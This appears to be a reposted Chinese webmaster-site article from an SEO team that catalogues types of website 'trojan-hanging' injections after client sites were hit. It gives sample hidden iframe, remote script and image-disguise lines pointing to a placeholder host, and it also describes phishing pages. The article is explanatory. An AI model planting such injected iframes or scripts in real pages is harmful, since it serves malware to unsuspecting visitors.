珍岛SEO研究 网站挂马代码类别
发布时间:2021-12-26 16:34:15 所属栏目:安全 来源:互联网
导读:前段时间公司优化项目中出现了几个网站被挂马的情况,所以SEO研究院就针对于挂马进行了研究,网站挂马常见的几种代码类型如下: 1、框架嵌入式网页挂马 框架嵌入式网页挂马是最早也是早有效的一种网络挂马技术,它是挂马者利用iframe语句,加载到任意网页中都
|
前段时间公司优化项目中出现了几个网站被挂马的情况,所以SEO研究院就针对于挂马进行了研究,网站挂马常见的几种代码类型如下: 1、框架嵌入式网页挂马 框架嵌入式网页挂马是最早也是早有效的一种网络挂马技术,它是挂马者利用iframe语句,加载到任意网页中都可执行的挂马形式。通常的代码形式如下: <iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> 2、JS调用型网页挂马 JS调用型网页挂马是利用JS脚本文件调用的原理进行的网页木马隐蔽挂马技术,例如黑客制作了一个.JS的文件,然后就利用这个JS代码调用挂马的网页。通常的代码形式如下: <script language=javascript src=http://www.xxx.com/gm.js></script> http://www.xxx.com/gm.js这就是JS的脚本文件,通过它可以调用和执行木马的服务端。这些JS文件一般都是可以通过工具生成的,黑客只需要输入相关的选项就可以了。 3、图片伪装挂马 黑客们为了逃避杀毒监视就生产了一种新的技术――图片木马,如下面的这段代码 <html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0></iframe> <img src="http://www.xxx.com/test.jpg"> </html> 攻击者将http://www.xxx.com/test.htm中的木马代码植入到了test.jpg图片文件中,这些嵌入代码的图片也都可以使用工具生成,黑客们只需要输入相关的选项就可以了。 4、网络钓鱼挂马 网络钓鱼挂马又称伪装调用挂马,是互联网中最常见的一种欺骗手段。它是黑客利用人们的好奇心、贪心等心理制作的一个伪装链接或网页。它利用社会工程学的欺骗方法,引诱用户点击,当用户打开一个看似正常的页面时,网页代码随之运行。 这种方式的隐蔽性极高,它往往是欺骗用户输入某些个人隐私信息,窃取个人隐私。如下图就是一个网络钓鱼网站,表面看起来没有异常,但是你看域名就会发现问题了。 (编辑:南通站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐